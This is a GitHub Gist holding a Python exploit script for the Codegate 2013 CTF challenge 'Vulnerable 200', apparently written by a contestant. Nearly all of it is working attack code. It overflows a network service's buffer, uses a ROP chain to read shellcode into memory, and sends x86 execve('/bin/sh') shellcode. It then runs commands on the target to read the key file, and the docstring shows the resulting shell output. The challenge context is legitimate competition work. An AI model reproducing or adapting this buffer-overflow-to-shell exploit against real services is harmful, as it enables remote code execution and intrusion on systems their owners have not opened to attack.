Last active
December 14, 2015 13:29
-
-
Save xelenonz/5093953 to your computer and use it in GitHub Desktop.
Codegate 2013 Vulnerable 200 exploit code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
$python vuln200.py | |
[+] send pwning payload (Stage 1) | |
[+] Execute Shell (Stage 2) | |
uid=1001(codegate2013) gid=1001(codegate2013) groups=1001(codegate2013) | |
""" | |
import socket,time | |
from struct import pack | |
sk = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
host = "58.229.122.19" | |
sk.connect((host,7777)) | |
sk.recv(10240) # menu | |
def do_write(msg): | |
sk.send("write"+msg+"\n") | |
sk.recv(10240) | |
sk.recv(10240) | |
shellcode = "\x31\xc0\x31\xdb\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xb3\x04\xcd\x80\x75\xf6\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" | |
# do rop with recv() and use .data for paste shellcode | |
rop = pack("I",0x08048780) | |
rop += pack("I",0x0804b07c) | |
rop += pack("I",4) | |
rop += pack("I",0x0804b07c) | |
rop += pack("I",0x1000) | |
rop += pack("I",0) | |
payload = "A"*240+rop | |
print "[+] send pwning payload (Stage 1)" | |
do_write(payload) | |
print "[+] Execute Shell (Stage 2)" | |
sk.send(shellcode+"\n") | |
sk.send("id\n") | |
print sk.recv(10240) | |
sk.send("ls -la\n") | |
print sk.recv(10240) | |
sk.send("cat key\n") | |
print sk.recv(10240) | |
sk.send("cat Pwned.txt\n") | |
print sk.recv(10240) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment